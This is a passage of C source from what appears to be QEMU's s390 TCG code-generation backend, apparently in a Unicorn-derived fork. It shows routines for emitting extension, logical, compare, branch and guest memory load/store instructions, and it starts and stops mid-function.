tgen_ext16u(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) { if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RRE, LLGHR, dest, src); return; } if (dest == src) { tcg_out_movi(s, type, TCG_TMP0, 0xffff); src = TCG_TMP0; } else { tcg_out_movi(s, type, dest, 0xffff); } if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, NR, dest, src); } else { tcg_out_insn(s, RRE, NGR, dest, src); } } static inline void tgen_ext32s(TCGContext *s, TCGReg dest, TCGReg src) { tcg_out_insn(s, RRE, LGFR, dest, src); } static inline void tgen_ext32u(TCGContext *s, TCGReg dest, TCGReg src) { tcg_out_insn(s, RRE, LLGFR, dest, src); } /* Accept bit patterns like these: 0....01....1 1....10....0 1..10..01..1 0..01..10..0 Copied from gcc sources. */ static inline bool risbg_mask(uint64_t c) { uint64_t lsb; /* We don't change the number of transitions by inverting, so make sure we start with the LSB zero. */ if (c & 1) { c = ~c; } /* Reject all zeros or all ones. */ if (c == 0) { return false; } /* Find the first transition. */ lsb = c & -c; /* Invert to look for a second transition. */ c = ~c; /* Erase the first transition. */ c &= -lsb; /* Find the second transition, if any. */ lsb = c & -c; /* Match if all the bits are 1's, or if c is zero. */ return c == -lsb; } static void tgen_andi_risbg(TCGContext *s, TCGReg out, TCGReg in, uint64_t val) { int msb, lsb; if ((val & 0x8000000000000001ull) == 0x8000000000000001ull) { /* Achieve wraparound by swapping msb and lsb. */ msb = 64 - ctz64(~val); lsb = clz64(~val) - 1; } else { msb = clz64(val); lsb = 63 - ctz64(val); } tcg_out_risbg(s, out, in, msb, lsb, 0, 1); } static void tgen_andi(TCGContext *s, TCGType type, TCGReg dest, uint64_t val) { static const S390Opcode ni_insns[4] = { RI_NILL, RI_NILH, RI_NIHL, RI_NIHH }; static const S390Opcode nif_insns[2] = { RIL_NILF, RIL_NIHF }; uint64_t valid = (type == TCG_TYPE_I32 ? 0xffffffffull : -1ull); int i; /* Look for the zero-extensions. */ if ((val & valid) == 0xffffffff) { tgen_ext32u(s, dest, dest); return; } if (s390_facilities & FACILITY_EXT_IMM) { if ((val & valid) == 0xff) { tgen_ext8u(s, TCG_TYPE_I64, dest, dest); return; } if ((val & valid) == 0xffff) { tgen_ext16u(s, TCG_TYPE_I64, dest, dest); return; } } /* Try all 32-bit insns that can perform it in one go. */ for (i = 0; i < 4; i++) { tcg_target_ulong mask = ~(0xffffull << i*16); if (((val | ~valid) & mask) == mask) { tcg_out_insn_RI(s, ni_insns[i], dest, val >> i*16); return; } } /* Try all 48-bit insns that can perform it in one go. */ if (s390_facilities & FACILITY_EXT_IMM) { for (i = 0; i < 2; i++) { tcg_target_ulong mask = ~(0xffffffffull << i*32); if (((val | ~valid) & mask) == mask) { tcg_out_insn_RIL(s, nif_insns[i], dest, val >> i*32); return; } } } if ((s390_facilities & FACILITY_GEN_INST_EXT) && risbg_mask(val)) { tgen_andi_risbg(s, dest, dest, val); return; } /* Use the constant pool if USE_REG_TB, but not for small constants. */ if (USE_REG_TB) { if (!maybe_out_small_movi(s, type, TCG_TMP0, val)) { tcg_out_insn(s, RXY, NG, dest, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, val & valid, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); return; } } else { tcg_out_movi(s, type, TCG_TMP0, val); } if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, NR, dest, TCG_TMP0); } else { tcg_out_insn(s, RRE, NGR, dest, TCG_TMP0); } } static void tgen_ori(TCGContext *s, TCGType type, TCGReg dest, uint64_t val) { static const S390Opcode oi_insns[4] = { RI_OILL, RI_OILH, RI_OIHL, RI_OIHH }; static const S390Opcode oif_insns[2] = { RIL_OILF, RIL_OIHF }; int i; /* Look for no-op. */ if (unlikely(val == 0)) { return; } /* Try all 32-bit insns that can perform it in one go. */ for (i = 0; i < 4; i++) { tcg_target_ulong mask = (0xffffull << i*16); if ((val & mask) != 0 && (val & ~mask) == 0) { tcg_out_insn_RI(s, oi_insns[i], dest, val >> i*16); return; } } /* Try all 48-bit insns that can perform it in one go. */ if (s390_facilities & FACILITY_EXT_IMM) { for (i = 0; i < 2; i++) { tcg_target_ulong mask = (0xffffffffull << i*32); if ((val & mask) != 0 && (val & ~mask) == 0) { tcg_out_insn_RIL(s, oif_insns[i], dest, val >> i*32); return; } } } /* Use the constant pool if USE_REG_TB, but not for small constants. */ if (maybe_out_small_movi(s, type, TCG_TMP0, val)) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, OR, dest, TCG_TMP0); } else { tcg_out_insn(s, RRE, OGR, dest, TCG_TMP0); } } else if (USE_REG_TB) { tcg_out_insn(s, RXY, OG, dest, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, val, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); } else { /* Perform the OR via sequential modifications to the high and low parts. Do this via recursion to handle 16-bit vs 32-bit masks in each half. */ tcg_debug_assert(s390_facilities & FACILITY_EXT_IMM); tgen_ori(s, type, dest, val & 0x00000000ffffffffull); tgen_ori(s, type, dest, val & 0xffffffff00000000ull); } } static void tgen_xori(TCGContext *s, TCGType type, TCGReg dest, uint64_t val) { /* Try all 48-bit insns that can perform it in one go. */ if (s390_facilities & FACILITY_EXT_IMM) { if ((val & 0xffffffff00000000ull) == 0) { tcg_out_insn(s, RIL, XILF, dest, val); return; } if ((val & 0x00000000ffffffffull) == 0) { tcg_out_insn(s, RIL, XIHF, dest, val >> 32); return; } } /* Use the constant pool if USE_REG_TB, but not for small constants. */ if (maybe_out_small_movi(s, type, TCG_TMP0, val)) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, XR, dest, TCG_TMP0); } else { tcg_out_insn(s, RRE, XGR, dest, TCG_TMP0); } } else if (USE_REG_TB) { tcg_out_insn(s, RXY, XG, dest, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, val, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); } else { /* Perform the xor by parts. */ tcg_debug_assert(s390_facilities & FACILITY_EXT_IMM); if (val & 0xffffffff) { tcg_out_insn(s, RIL, XILF, dest, val); } if (val > 0xffffffff) { tcg_out_insn(s, RIL, XIHF, dest, val >> 32); } } } static int tgen_cmp(TCGContext *s, TCGType type, TCGCond c, TCGReg r1, TCGArg c2, bool c2const, bool need_carry) { bool is_unsigned = is_unsigned_cond(c); S390Opcode op; if (c2const) { if (c2 == 0) { if (!(is_unsigned && need_carry)) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, LTR, r1, r1); } else { tcg_out_insn(s, RRE, LTGR, r1, r1); } return tcg_cond_to_ltr_cond[c]; } } if (!is_unsigned && c2 == (int16_t)c2) { op = (type == TCG_TYPE_I32 ? RI_CHI : RI_CGHI); tcg_out_insn_RI(s, op, r1, c2); goto exit; } if (s390_facilities & FACILITY_EXT_IMM) { if (type == TCG_TYPE_I32) { op = (is_unsigned ? RIL_CLFI : RIL_CFI); tcg_out_insn_RIL(s, op, r1, c2); goto exit; } else if (c2 == (is_unsigned ? (uint32_t)c2 : (int32_t)c2)) { op = (is_unsigned ? RIL_CLGFI : RIL_CGFI); tcg_out_insn_RIL(s, op, r1, c2); goto exit; } } /* Use the constant pool, but not for small constants. */ if (maybe_out_small_movi(s, type, TCG_TMP0, c2)) { c2 = TCG_TMP0; /* fall through to reg-reg */ } else if (USE_REG_TB) { if (type == TCG_TYPE_I32) { op = (is_unsigned ? RXY_CLY : RXY_CY); tcg_out_insn_RXY(s, op, r1, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, (uint32_t)c2, R_390_20, s->code_ptr - 2, 4 - (intptr_t)s->code_gen_ptr); } else { op = (is_unsigned ? RXY_CLG : RXY_CG); tcg_out_insn_RXY(s, op, r1, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, c2, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); } goto exit; } else { if (type == TCG_TYPE_I32) { op = (is_unsigned ? RIL_CLRL : RIL_CRL); tcg_out_insn_RIL(s, op, r1, 0); new_pool_label(s, (uint32_t)c2, R_390_PC32DBL, s->code_ptr - 2, 2 + 4); } else { op = (is_unsigned ? RIL_CLGRL : RIL_CGRL); tcg_out_insn_RIL(s, op, r1, 0); new_pool_label(s, c2, R_390_PC32DBL, s->code_ptr - 2, 2); } goto exit; } } if (type == TCG_TYPE_I32) { op = (is_unsigned ? RR_CLR : RR_CR); tcg_out_insn_RR(s, op, r1, c2); } else { op = (is_unsigned ? RRE_CLGR : RRE_CGR); tcg_out_insn_RRE(s, op, r1, c2); } exit: return tcg_cond_to_s390_cond[c]; } static void tgen_setcond(TCGContext *s, TCGType type, TCGCond cond, TCGReg dest, TCGReg c1, TCGArg c2, int c2const) { int cc; bool have_loc; /* With LOC2, we can always emit the minimum 3 insns. */ if (s390_facilities & FACILITY_LOAD_ON_COND2) { /* Emit: d = 0, d = (cc ? 1 : d). */ cc = tgen_cmp(s, type, cond, c1, c2, c2const, false); tcg_out_movi(s, TCG_TYPE_I64, dest, 0); tcg_out_insn(s, RIE, LOCGHI, dest, 1, cc); return; } have_loc = (s390_facilities & FACILITY_LOAD_ON_COND) != 0; /* For HAVE_LOC, only the paths through GTU/GT/LEU/LE are smaller. */ restart: switch (cond) { case TCG_COND_NE: /* X != 0 is X > 0. */ if (c2const && c2 == 0) { cond = TCG_COND_GTU; } else { break; } /* fallthru */ case TCG_COND_GTU: case TCG_COND_GT: /* The result of a compare has CC=2 for GT and CC=3 unused. ADD LOGICAL WITH CARRY considers (CC & 2) the carry bit. */ tgen_cmp(s, type, cond, c1, c2, c2const, true); tcg_out_movi(s, type, dest, 0); tcg_out_insn(s, RRE, ALCGR, dest, dest); return; case TCG_COND_EQ: /* X == 0 is X <= 0. */ if (c2const && c2 == 0) { cond = TCG_COND_LEU; } else { break; } /* fallthru */ case TCG_COND_LEU: case TCG_COND_LE: /* As above, but we're looking for borrow, or !carry. The second insn computes d - d - borrow, or -1 for true and 0 for false. So we must mask to 1 bit afterward. */ tgen_cmp(s, type, cond, c1, c2, c2const, true); tcg_out_insn(s, RRE, SLBGR, dest, dest); tgen_andi(s, type, dest, 1); return; case TCG_COND_GEU: case TCG_COND_LTU: case TCG_COND_LT: case TCG_COND_GE: /* Swap operands so that we can use LEU/GTU/GT/LE. */ if (c2const) { if (have_loc) { break; } tcg_out_movi(s, type, TCG_TMP0, c2); c2 = c1; c2const = 0; c1 = TCG_TMP0; } else { TCGReg t = c1; c1 = c2; c2 = t; } cond = tcg_swap_cond(cond); goto restart; default: g_assert_not_reached(); } cc = tgen_cmp(s, type, cond, c1, c2, c2const, false); if (have_loc) { /* Emit: d = 0, t = 1, d = (cc ? t : d). */ tcg_out_movi(s, TCG_TYPE_I64, dest, 0); tcg_out_movi(s, TCG_TYPE_I64, TCG_TMP0, 1); tcg_out_insn(s, RRF, LOCGR, dest, TCG_TMP0, cc); } else { /* Emit: d = 1; if (cc) goto over; d = 0; over: */ tcg_out_movi(s, type, dest, 1); tcg_out_insn(s, RI, BRC, cc, (4 + 4) >> 1); tcg_out_movi(s, type, dest, 0); } } static void tgen_movcond(TCGContext *s, TCGType type, TCGCond c, TCGReg dest, TCGReg c1, TCGArg c2, int c2const, TCGArg v3, int v3const) { int cc; if (s390_facilities & FACILITY_LOAD_ON_COND) { cc = tgen_cmp(s, type, c, c1, c2, c2const, false); if (v3const) { tcg_out_insn(s, RIE, LOCGHI, dest, v3, cc); } else { tcg_out_insn(s, RRF, LOCGR, dest, v3, cc); } } else { c = tcg_invert_cond(c); cc = tgen_cmp(s, type, c, c1, c2, c2const, false); /* Emit: if (cc) goto over; dest = r3; over: */ tcg_out_insn(s, RI, BRC, cc, (4 + 4) >> 1); tcg_out_insn(s, RRE, LGR, dest, v3); } } static void tgen_clz(TCGContext *s, TCGReg dest, TCGReg a1, TCGArg a2, int a2const) { /* Since this sets both R and R+1, we have no choice but to store the result into R0, allowing R1 == TCG_TMP0 to be clobbered as well. */ QEMU_BUILD_BUG_ON(TCG_TMP0 != TCG_REG_R1); tcg_out_insn(s, RRE, FLOGR, TCG_REG_R0, a1); if (a2const && a2 == 64) { tcg_out_mov(s, TCG_TYPE_I64, dest, TCG_REG_R0); } else { if (a2const) { tcg_out_movi(s, TCG_TYPE_I64, dest, a2); } else { tcg_out_mov(s, TCG_TYPE_I64, dest, a2); } if (s390_facilities & FACILITY_LOAD_ON_COND) { /* Emit: if (one bit found) dest = r0. */ tcg_out_insn(s, RRF, LOCGR, dest, TCG_REG_R0, 2); } else { /* Emit: if (no one bit found) goto over; dest = r0; over: */ tcg_out_insn(s, RI, BRC, 8, (4 + 4) >> 1); tcg_out_insn(s, RRE, LGR, dest, TCG_REG_R0); } } } static void tgen_deposit(TCGContext *s, TCGReg dest, TCGReg src, int ofs, int len, int z) { int lsb = (63 - ofs); int msb = lsb - (len - 1); tcg_out_risbg(s, dest, src, msb, lsb, ofs, z); } static void tgen_extract(TCGContext *s, TCGReg dest, TCGReg src, int ofs, int len) { tcg_out_risbg(s, dest, src, 64 - len, 63, 64 - ofs, 1); } static void tgen_gotoi(TCGContext *s, int cc, tcg_insn_unit *dest) { ptrdiff_t off = dest - s->code_ptr; if (off == (int16_t)off) { tcg_out_insn(s, RI, BRC, cc, off); } else if (off == (int32_t)off) { tcg_out_insn(s, RIL, BRCL, cc, off); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)dest); tcg_out_insn(s, RR, BCR, cc, TCG_TMP0); } } static void tgen_branch(TCGContext *s, int cc, TCGLabel *l) { if (l->has_value) { tgen_gotoi(s, cc, l->u.value_ptr); } else if (USE_LONG_BRANCHES) { tcg_out16(s, RIL_BRCL | (cc << 4)); tcg_out_reloc(s, s->code_ptr, R_390_PC32DBL, l, 2); s->code_ptr += 2; } else { tcg_out16(s, RI_BRC | (cc << 4)); tcg_out_reloc(s, s->code_ptr, R_390_PC16DBL, l, 2); s->code_ptr += 1; } } static void tgen_compare_branch(TCGContext *s, S390Opcode opc, int cc, TCGReg r1, TCGReg r2, TCGLabel *l) { intptr_t off = 0; if (l->has_value) { off = l->u.value_ptr - s->code_ptr; tcg_debug_assert(off == (int16_t)off); } else { tcg_out_reloc(s, s->code_ptr + 1, R_390_PC16DBL, l, 2); } tcg_out16(s, (opc & 0xff00) | (r1 << 4) | r2); tcg_out16(s, off); tcg_out16(s, cc << 12 | (opc & 0xff)); } static void tgen_compare_imm_branch(TCGContext *s, S390Opcode opc, int cc, TCGReg r1, int i2, TCGLabel *l) { tcg_target_long off = 0; if (l->has_value) { off = l->u.value_ptr - s->code_ptr; tcg_debug_assert(off == (int16_t)off); } else { tcg_out_reloc(s, s->code_ptr + 1, R_390_PC16DBL, l, 2); } tcg_out16(s, (opc & 0xff00) | (r1 << 4) | cc); tcg_out16(s, off); tcg_out16(s, (i2 << 8) | (opc & 0xff)); } static void tgen_brcond(TCGContext *s, TCGType type, TCGCond c, TCGReg r1, TCGArg c2, int c2const, TCGLabel *l) { int cc; if (s390_facilities & FACILITY_GEN_INST_EXT) { bool is_unsigned = is_unsigned_cond(c); bool in_range; S390Opcode opc; cc = tcg_cond_to_s390_cond[c]; if (!c2const) { opc = (type == TCG_TYPE_I32 ? (is_unsigned ? RIE_CLRJ : RIE_CRJ) : (is_unsigned ? RIE_CLGRJ : RIE_CGRJ)); tgen_compare_branch(s, opc, cc, r1, c2, l); return; } /* COMPARE IMMEDIATE AND BRANCH RELATIVE has an 8-bit immediate field. If the immediate we've been given does not fit that range, we'll fall back to separate compare and branch instructions using the larger comparison range afforded by COMPARE IMMEDIATE. */ if (type == TCG_TYPE_I32) { if (is_unsigned) { opc = RIE_CLIJ; in_range = (uint32_t)c2 == (uint8_t)c2; } else { opc = RIE_CIJ; in_range = (int32_t)c2 == (int8_t)c2; } } else { if (is_unsigned) { opc = RIE_CLGIJ; in_range = (uint64_t)c2 == (uint8_t)c2; } else { opc = RIE_CGIJ; in_range = (int64_t)c2 == (int8_t)c2; } } if (in_range) { tgen_compare_imm_branch(s, opc, cc, r1, c2, l); return; } } cc = tgen_cmp(s, type, c, r1, c2, c2const, false); tgen_branch(s, cc, l); } static void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) { ptrdiff_t off = dest - s->code_ptr; if (off == (int32_t)off) { tcg_out_insn(s, RIL, BRASL, TCG_REG_R14, off); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)dest); tcg_out_insn(s, RR, BASR, TCG_REG_R14, TCG_TMP0); } } static void tcg_out_qemu_ld_direct(TCGContext *s, MemOp opc, TCGReg data, TCGReg base, TCGReg index, int disp) { switch (opc & (MO_SSIZE | MO_BSWAP)) { case MO_UB: tcg_out_insn(s, RXY, LLGC, data, base, index, disp); break; case MO_SB: tcg_out_insn(s, RXY, LGB, data, base, index, disp); break; case MO_UW | MO_BSWAP: /* swapped unsigned halfword load with upper bits zeroed */ tcg_out_insn(s, RXY, LRVH, data, base, index, disp); tgen_ext16u(s, TCG_TYPE_I64, data, data); break; case MO_UW: tcg_out_insn(s, RXY, LLGH, data, base, index, disp); break; case MO_SW | MO_BSWAP: /* swapped sign-extended halfword load */ tcg_out_insn(s, RXY, LRVH, data, base, index, disp); tgen_ext16s(s, TCG_TYPE_I64, data, data); break; case MO_SW: tcg_out_insn(s, RXY, LGH, data, base, index, disp); break; case MO_UL | MO_BSWAP: /* swapped unsigned int load with upper bits zeroed */ tcg_out_insn(s, RXY, LRV, data, base, index, disp); tgen_ext32u(s, data, data); break; case MO_UL: tcg_out_insn(s, RXY, LLGF, data, base, index, disp); break; case MO_SL | MO_BSWAP: /* swapped sign-extended int load */ tcg_out_insn(s, RXY, LRV, data, base, index, disp); tgen_ext32s(s, data, data); break; case MO_SL: tcg_out_insn(s, RXY, LGF, data, base, index, disp); break; case MO_Q | MO_BSWAP: tcg_out_insn(s, RXY, LRVG, data, base, index, disp); break; case MO_Q: tcg_out_insn(s, RXY, LG, data, base, index, disp); break; default: tcg_abort(); } } static void tcg_out_qemu_st_direct(TCGContext *s, MemOp opc, TCGReg data, TCGReg base, TCGReg index, int disp) { switch (opc & (MO_SIZE | MO_BSWAP)) { case MO_UB: if (disp >= 0 && disp < 0x1000) { tcg_out_insn(s, RX, STC, data, base, index, disp); } else { tcg_out_insn(s, RXY, STCY, data, base, index, disp); } break; case MO_UW | MO_BSWAP: tcg_out_insn(s, RXY, STRVH, data, base, index, disp); break; case MO_UW: if (disp >= 0 && disp < 0x1000) { tcg_out_insn(s, RX, STH, data, base, index, disp); } else { tcg_out_insn(s, RXY, STHY, data, base, index, disp); } break; case MO_UL | MO_BSWAP: tcg_out_insn(s, RXY, STRV, data, base, index, disp); break; case MO_UL: if (disp >= 0 && disp < 0x1000) { tcg_out_insn(s, RX, ST, data, base, index, disp); } else { tcg_out_insn(s, RXY, STY, data, base, index, disp); } break; case MO_Q | MO_BSWAP: tcg_out_insn(s, RXY, STRVG, data, base, index, disp); break; case MO_Q: tcg_out_insn(s, RXY, STG, data, base, index, disp); break; default: tcg_abort(); } } #if defined(CONFIG_SOFTMMU) #include "../tcg-ldst.inc.c" /* We're expecting to use a 20-bit negative offset on the tlb memory ops. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -(1 << 19)); /* Load and compare a TLB entry, leaving the flags set. Loads the TLB addend into R2. Returns a register with the santitized guest address. */ static TCGReg tcg_out_tlb_read(TCGContext *s, TCGReg addr_reg, MemOp opc, int mem_index, bool is_ld) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); unsigned s_mask = (1 << s_bits) - 1; unsigned a_mask = (1 << a_bits) - 1; int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); int ofs, a_off; uint64_t tlb_mask; tcg_out_sh64(s, RSY_SRLG, TCG_REG_R2, addr_reg, TCG_REG_NONE, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); tcg_out_insn(s, RXY, NG, TCG_REG_R2, TCG_AREG0, TCG_REG_NONE, mask_off); tcg_out_insn(s, RXY, AG, TCG_REG_R2, TCG_AREG0, TCG_REG_NONE, table_off); /* For aligned accesses, we check the first byte and include the alignment bits within the address. For unaligned access, we check that we don't cross pages using the address of the last byte of the access. */ a_off = (a_bits >= s_bits ? 0 : s_mask - a_mask); tlb_mask = (uint64_t)TARGET_PAGE_MASK | a_mask; if ((s390_facilities & FACILITY_GEN_INST_EXT) && a_off == 0) { tgen_andi_risbg(s, TCG_REG_R3, addr_reg, tlb_mask); } else { tcg_out_insn(s, RX, LA, TCG_REG_R3, addr_reg, TCG_REG_NONE, a_off); tgen_andi(s, TCG_TYPE_TL, TCG_REG_R3, tlb_mask); } if (is_ld) { ofs = offsetof(CPUTLBEntry, addr_read); } else { ofs = offsetof(CPUTLBEntry, addr_write); } if (TARGET_LONG_BITS == 32) { tcg_out_insn(s, RX, C, TCG_REG_R3, TCG_REG_R2, TCG_REG_NONE, ofs); } else { tcg_out_insn(s, RXY, CG, TCG_REG_R3, TCG_REG_R2, TCG_REG_NONE, ofs); } tcg_out_insn(s, RXY, LG, TCG_REG_R2, TCG_REG_R2, TCG_REG_NONE, offsetof(CPUTLBEntry, addend)); if (TARGET_LONG_BITS == 32) { tgen_ext32u(s, TCG_REG_R3, addr_reg); return TCG_REG_R3; } return addr_reg; } static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOpIdx oi, TCGReg data, TCGReg addr, tcg_insn_unit *raddr, tcg_insn_unit *label_ptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->datalo_reg = data; label->addrlo_reg = addr; label->raddr = raddr; label->label_ptr[0] = label_ptr; } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGReg addr_reg = lb->addrlo_reg; TCGReg data_reg = lb->datalo_reg; TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); if (!patch_reloc(lb->label_ptr[0], R_390_PC16DBL, (intptr_t)s->code_ptr, 2)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_AREG0); if (TARGET_LONG_BITS == 64) { tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R3, addr_reg); } tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R4, oi); tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R5, (uintptr_t)lb->raddr); tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SSIZE)]); tcg_out_mov(s, TCG_TYPE_I64, data_reg, TCG_REG_R2); tgen_gotoi(s, S390_CC_ALWAYS, lb->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGReg addr_reg = lb->addrlo_reg; TCGReg data_reg = lb->datalo_reg; TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); if (!patch_reloc(lb->label_ptr[0], R_390_PC16DBL, (intptr_t)s->code_ptr, 2)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_AREG0); if (TARGET_LONG_BITS == 64) { tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R3, addr_reg); } switch (opc & MO_SIZE) { case MO_UB: tgen_ext8u(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); break; case MO_UW: tgen_ext16u(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); break; case MO_UL: tgen_ext32u(s, TCG_REG_R4, data_reg); break; case MO_Q: tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); break; default: tcg_abort(); } tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R5, oi); tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R6, (uintptr_t)lb->raddr); tcg_out_call(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); tgen_gotoi(s, S390_CC_ALWAYS, lb->raddr); return true; } #else static void tcg_prepare_user_ldst(TCGContext *s, TCGReg *addr_reg, TCGReg *index_reg, tcg_target_long *disp) { if (TARGET_LONG_BITS == 32) { tgen_ext32u(s, TCG_TMP0, *addr_reg); *addr_reg = TCG_TMP0; } if (guest_base < 0x80000) { *index_reg = TCG_REG_NONE; *disp = guest_base; } else { *index_reg = TCG_GUEST_BASE_REG; *disp = 0; } } #endif /* CONFIG_SOFTMMU */ static void tcg_out_qemu_ld(TCGContext* s, TCGReg data_reg, TCGReg addr_reg, TCGMemOpIdx oi) { MemOp opc = get_memop(oi); #ifdef CONFIG_SOFTMMU unsigned mem_index = get_mmuidx(oi); tcg_insn_unit *label_ptr; TCGReg base_reg; base_reg = tcg_out_tlb_read(s, addr_reg, opc, mem_index, 1); tcg_out16(s, RI_BRC | (S390_CC_NE << 4)); label_ptr = s->code_ptr; s->code_ptr += 1; tcg_out_qemu_ld_direct(s, opc, data_reg, base_reg, TCG_REG_R2, 0); add_qemu_ldst_label(s, 1, oi, data_reg, addr_reg, s->code_ptr, label_ptr); #else TCGReg index_reg; tcg_target_long disp; tcg_prepare_user_ldst(s, &addr_reg, &index_reg, &disp); tcg_out_qemu_ld_direct(s, opc, data_reg, addr_reg, index_reg, disp); #endif } static void tcg_out_qemu_st(TCGContext* s, TCGReg data_reg, TCGReg addr_reg, TCGMemOpIdx oi) { MemOp opc = get_memop(oi); #ifdef CONFIG_SOFTMMU unsigned mem_index = get_mmuidx(oi); tcg_insn_unit *label_ptr; TCGReg base_reg; base_reg = tcg_out_tlb_read(s, addr_reg, opc, mem_index, 0); tcg_out16(s, RI_BRC | (S390_CC_NE << 4)); label_ptr = s->code_ptr; s->code_ptr += 1; tcg_out_qemu_st_direct(s, opc, data_reg, base_reg, TCG_REG_R2, 0); add_qemu_ldst_label(s, 0, oi, data_reg, addr_reg, s->code_ptr, label_ptr); #else TCGReg index_reg; tcg_target_long disp; tcg_prepare_user_ldst(s, &addr_reg, &index_reg, &disp); tcg_out_qemu_st_direct(s, opc, data_reg, addr_reg, index_reg, disp); #endif } # define OP_32_64(x) \ case glue(glue(INDEX_op_,x),_i32): \ case glue(glue(INDEX_op_,x),_i64) static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { S390Opcode op, op2; TCGArg a0, a1, a2; switch (opc) { case INDEX_op_exit_tb: /* Reuse the zeroing that exists for goto_ptr. */ a0 = args[0]; if (a0 == 0) { tgen_gotoi(s, S390_CC_ALWAYS, s->code_gen_epilogue); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, a0); tgen_gotoi(s, S390_CC_ALWAYS, tb_ret_addr); } break; case INDEX_op_goto_tb: a0 = args[0]; if (s->tb_jmp_insn_offset) { /* branch displacement must be aligned for atomic patching; * see if we need to add extra nop before branch */ if (!QEMU_PTR_IS_ALIGNED(s->code_ptr + 1, 4)) { tcg_out16(s, NOP); } tcg_debug_assert(!USE_REG_TB); tcg_out16(s, RIL_BRCL | (S390_CC_ALWAYS << 4)); s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); s->code_ptr += 2; } else { /* load address stored at s->tb_jmp_target_addr + a0 */ tcg_out_ld_abs(s, TCG_TYPE_PTR, TCG_REG_TB, s->tb_jmp_target_addr + a0); /* and go there */ tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, TCG_REG_TB); } set_jmp_reset_offset(s, a0); /* For the unlinked path of goto_tb, we need to reset TCG_REG_TB to the beginning of this TB. */ if (USE_REG_TB) { int ofs = -tcg_current_code_size(s); assert(ofs == (int16_t)ofs); tcg_out_insn(s, RI, AGHI, TCG_REG_TB, ofs); } break; case INDEX_op_goto_ptr: a0 = args[0]; if (USE_REG_TB) { tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_TB, a0); } tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, a0); break; OP_32_64(ld8u): /* ??? LLC (RXY format) is only present with the extended-immediate facility, whereas LLGC is always present. */ tcg_out_mem(s, 0, RXY_LLGC, args[0], args[1], TCG_REG_NONE, args[2]); break; OP_32_64(ld8s): /* ??? LB is no smaller than LGB, so no point to using it. */ tcg_out_mem(s, 0, RXY_LGB, args[0], args[1], TCG_REG_NONE, args[2]); break; OP_32_64(ld16u): /* ??? LLH (RXY format) is only present with the extended-immediate facility, whereas LLGH is always present. */ tcg_out_mem(s, 0, RXY_LLGH, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld16s_i32: tcg_out_mem(s, RX_LH, RXY_LHY, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld_i32: tcg_out_ld(s, TCG_TYPE_I32, args[0], args[1], args[2]); break; OP_32_64(st8): tcg_out_mem(s, RX_STC, RXY_STCY, args[0], args[1], TCG_REG_NONE, args[2]); break; OP_32_64(st16): tcg_out_mem(s, RX_STH, RXY_STHY, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_st_i32: tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]); break; case INDEX_op_add_i32: a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; if (const_args[2]) { do_addi_32: if (a0 == a1) { if (a2 == (int16_t)a2) { tcg_out_insn(s, RI, AHI, a0, a2); break; } if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RIL, AFI, a0, a2); break; } } tcg_out_mem(s, RX_LA, RXY_LAY, 